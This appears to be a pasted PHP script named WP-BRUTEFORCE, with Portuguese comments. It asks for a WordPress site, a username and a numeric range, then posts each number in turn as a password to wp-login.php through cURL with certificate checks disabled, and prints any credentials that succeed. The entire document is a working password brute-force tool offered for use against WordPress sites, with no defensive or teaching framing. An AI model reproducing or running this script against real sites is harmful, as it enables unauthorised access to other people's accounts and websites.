Untitled

<?php

 /*
  * Script: WP-BRUTEFORCE
  * Author: Hamboldt
  * E-mail: Hamboldt[at]hotmail[dot]com
  *
  */

function wpLogin($Login, $Senha, $Address) {


    /*
     * Arquivo para salvar us kuki
     */
    $CookieFile = "cookie.txt";

    /*
     * Os dados que serão jogados na URL
     */
    $x = "log=".$Login."&pwd=".$Senha."&wp-submit=Log%20In&redirect_to=".$Address."wp-admin/&testcookie=1";

    /*
     * Sessão Curl
     */
    $Hamboldt = curl_init();

    curl_setopt($Hamboldt, CURLOPT_URL, $Address . "wp-login.php");
    curl_setopt($Hamboldt, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($Hamboldt, CURLOPT_TIMEOUT, 60);
    curl_setopt($Hamboldt, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($Hamboldt, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($Hamboldt, CURLOPT_COOKIEJAR, $CookieFile);
    curl_setopt($Hamboldt, CURLOPT_REFERER, $Address . "wp-admin/");
    curl_setopt($Hamboldt, CURLOPT_POSTFIELDS, $x);
    curl_setopt($Hamboldt, CURLOPT_POST, 1);

    /*
     * Saida de dados
     */
    $out = curl_exec($Hamboldt);

    /*
     * Verifica se o login foi bem sucedido
     */
    $rgx = preg_match('/admin-ajax.php/', $out, $match, PREG_OFFSET_CAPTURE, 14);
    if($rgx) return 1;
}

  /*
   * Função para gerar um password randomico
   */
  function HamDomic ($site, $user, $inicial, $final) {

    for ($pass = $inicial; $pass <= $final; $pass++) {
        if(wpLogin($user, $pass, $site))
            die("\n [+] Site: $site \n [+]User: $user \n [+]Pass: $pass \n\n");
    }
  }
    /*
     * BANNER
     */
    system('clear');
    print_r("
            H A M B O L D T\n\n");

    /*
     * Valores que o usuário irá dar entrada
     */
    $site       =   readline("  [*] Site: ");
    $user       =   readline("  [*] User: ");
    $inicial    =   readline("  [*] Inicial: ");
    $final      =   readline("  [*] Final: ");

    /*
     * Executa função
     */
    HamDomic($site, $user, $inicial, $final);
?>